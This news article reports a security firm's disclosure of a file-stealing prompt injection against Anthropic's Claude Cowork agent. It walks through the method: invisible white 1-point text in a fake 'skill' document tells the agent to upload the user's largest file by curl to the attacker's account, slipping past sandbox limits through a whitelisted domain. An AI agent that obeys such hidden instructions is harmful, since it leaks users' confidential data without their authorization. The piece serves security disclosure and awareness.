Claude Cowork hit with file-stealing prompt injection days after Anthropic's launch
Key Points
- Security researchers have documented a critical vulnerability in Anthropic's new AI system, Claude Cowork, shortly after its release.
- The flaw allows attackers to steal confidential user files without requiring human authorization. The attack utilizes hidden prompt injections inserted into documents that appear harmless.
- By hiding instructions in this way, the method tricks the AI into accessing and exposing private data while the user believes they are working with a safe file.
Just days after Anthropic unveiled Claude Cowork, security researchers documented a critical vulnerability that lets attackers steal confidential user files through hidden prompt injections, a well-known issue of AI systems.
Anthropic's new agentic AI system Claude Cowork is vulnerable to file exfiltration through indirect prompt injection, according to security researchers at PromptArmor. They documented the flaw just two days after the Research Preview went live.
The vulnerability stems from an isolation flaw in Claude's code execution environment that was already known before Cowork existed. According to PromptArmor, security researcher Johann Rehberger had previously identified and disclosed the issue in Claude.ai chat. Anthropic acknowledged the problem but allegedly never fixed it.
Malicious commands hide in plain sight
The attack chain PromptArmor documented starts when a user connects Cowork to a local folder containing confidential data. The attacker then gets a file with a hidden prompt injection into that folder.
The technique is particularly sneaky: attackers can hide the injection in a .docx file disguised as a harmless "skill" document, a new prompt method for agentic AI systems that Anthropic just introduced. Skill files are already being shared online, so users should be cautious about downloading them from untrusted sources.
The malicious text uses 1-point font, white color on a white background, and 0.1 line spacing, making it virtually invisible to human eyes.

When the user asks Cowork to analyze their files using the uploaded "skill," the injection takes over. It tells Claude to run a curl command that sends the largest available file to Anthropic's File Upload API using the attacker's API key. The file lands in the attacker's Anthropic account, where they can access it at will. No human authorization is needed at any point.

PromptArmor first ran the demonstration against Claude Haiku, Anthropic's weakest model. But even Claude Opus 4.5, the company's most capable model, fell for manipulation. In one test, a user uploaded a malicious integration guide while developing an AI tool. Customer data was successfully exfiltrated through the whitelisted Anthropic API domain, bypassing the sandbox restrictions of the virtual machine running the code.
The researchers also found a potential denial of service bug: when Claude tries to read a file whose extension doesn't match its actual content, the API throws repeated errors in all subsequent chats within that conversation.
Anthropic had touted that Cowork was built in just a week and a half, written entirely by Claude Code, the AI tool that Cowork is based on. These newly discovered security flaws raise questions about whether security got enough attention during that rapid development.
Prompt injection remains an unsolved problem
Prompt injection attacks have plagued the AI industry for years. Despite ongoing efforts, no one has managed to prevent them or even significantly limit their impact. Even Anthropic's "most secure" model, Opus 4.5, remains highly vulnerable.
A tool like Cowork, which connects to your computer and numerous other data sources, creates many potential entry points. Unlike phishing attacks, which users can learn to spot, there's no way for ordinary people to defend against these exploits.
The case also highlights a fundamental tension in agentic AI systems: the more autonomy they have, the larger their attack surface becomes. Previous research has already shown this pattern.
AI News Without the Hype – Curated by Humans
As a THE DECODER subscriber, you get ad-free reading, our weekly AI newsletter, the exclusive "AI Radar" Frontier Report 6× per year, access to comments, and our complete archive.
Subscribe now